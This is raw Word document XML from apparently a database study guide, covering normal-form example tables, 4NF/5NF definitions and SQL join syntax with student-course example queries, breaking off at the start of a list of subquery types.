    <w:p w14:paraId="6D8E0C76" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Course-Instructor Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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00"/>
        <w:gridCol w:w="1025"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0F191B3A" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D80F5A3"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Course</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="575C6846"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="11DED500" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513632B9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2744B4F5"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="53279DA4" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9E2B1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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE876EF"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="104D6FB3" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31D78F38"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English</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359E2DB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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05C2D6CF" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Instructor-Department Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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25"/>
        <w:gridCol w:w="1161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="077FFBD3" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB78031"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00BDAC19"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Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0B664C66" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53EC7EB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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C6B04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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0E945ABE" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8D9109"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4801F803"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Science</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="258C88C0" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C69E1B8"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Dr. Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3505409D"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Literature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B66ECB1" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BCNF ensures that all determinants are candidate keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56930BF4"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Advanced Normal Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623E7EAF" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fourth Normal Form (4NF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deals with multi-valued dependencies, ensuring that a record’s multi-valued facts are stored in separate tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128EE0C2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fifth Normal Form (5NF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deals with join dependencies and ensures that data is decomposed into smaller tables without losing information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC708B" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD88FA4" w14:textId="7EA68213" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc178383302"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is ACID transactions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="23776A52" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CE88E1" w14:textId="373693DF" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc178383303"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between a join and a subquery in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="5C4B7C22"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In SQL, joins and subqueries are two different techniques for retrieving related data from multiple tables. Both are essential tools for working with relational databases, but they serve different purposes and can be used in different scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E61917"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Joins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D610B"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Joins are used to combine rows from two or more tables based on a related column between them. The result is a single table that contains columns from all the joined tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D60CD19"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Types of Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8F35A" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Inner Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C912B"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Returns rows when there is a match in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA17C7"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BA8B2" w14:textId="77777777" w:rsidR="00045AD4" w:rsidRPr="00DA2F32" w:rsidRDefault="00045AD4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B783AAA" w14:textId="353390ED"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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F4945"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table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5AE124"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INNER JOIN table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BEC55"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ON table1.common_column = table2.common_column;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102652F2"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6F1989CD"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SELECT students.name, courses.course_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C86506"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD87238"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INNER JOIN enrollments ON students.student_id = enrollments.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA29C6B"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INNER JOIN courses ON enrollments.course_id = courses.course_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257990E" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Left Join (Left Outer Join)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45975C04"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Returns all rows from the left table and matched rows from the right table. Non-matching rows from the right table will have NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB1EC8E"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ADA41A"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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D6FFB"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table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DD7A9"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LEFT JOIN table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72874250"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ON table1.common_column = table2.common_column;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07E1AF"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36FA5F6C"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students.name, courses.course_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2B8F25"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F6146"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LEFT JOIN enrollments ON students.student_id = enrollments.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3844F"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LEFT JOIN courses ON enrollments.course_id = courses.course_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157A848" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Right Join (Right Outer Join)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADFCD57"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Returns all rows from the right table and matched rows from the left table. Non-matching rows from the left table will have NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D54DC3"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C19B216"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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1C171"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table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F708E2"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RIGHT JOIN table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C9141"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ON table1.common_column = table2.common_column;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD4B92"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1C87F522"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students.name, courses.course_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3C988"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E73861"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RIGHT JOIN enrollments ON students.student_id = enrollments.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326AB024"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RIGHT JOIN courses ON enrollments.course_id = courses.course_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F412D2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full Join (Full Outer Join)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82CF8A"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Returns all rows when there is a match in one of the tables. Non-matching rows from both tables will have NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460C562"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD0D685"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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C27D2A"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table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45488DB9"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FULL JOIN table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71C767"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ON table1.common_column = table2.common_column;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB820D"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4DE08F9E"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students.name, courses.course_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF277EA"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF2BD8"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FULL JOIN enrollments ON students.student_id = enrollments.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71BD29"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FULL JOIN courses ON enrollments.course_id = courses.course_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22729083" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cross Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EA811"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Returns the Cartesian product of both tables, i.e., every row from the first table is combined with every row from the second table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532249AC"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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79848F55"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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BB600"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table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01FD3C"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CROSS JOIN table2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5CBB8A" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36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995C8BC"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students.name, courses.course_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242C777"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students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EADAC0"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CROSS JOIN courses;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6CC46"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Subqueries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D675FB6"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 subquery is a query nested inside another query. Subqueries are used to perform operations that require multiple steps or to filter data based on the results of another query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CFB17E"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Types of Subqueries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D909AA" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
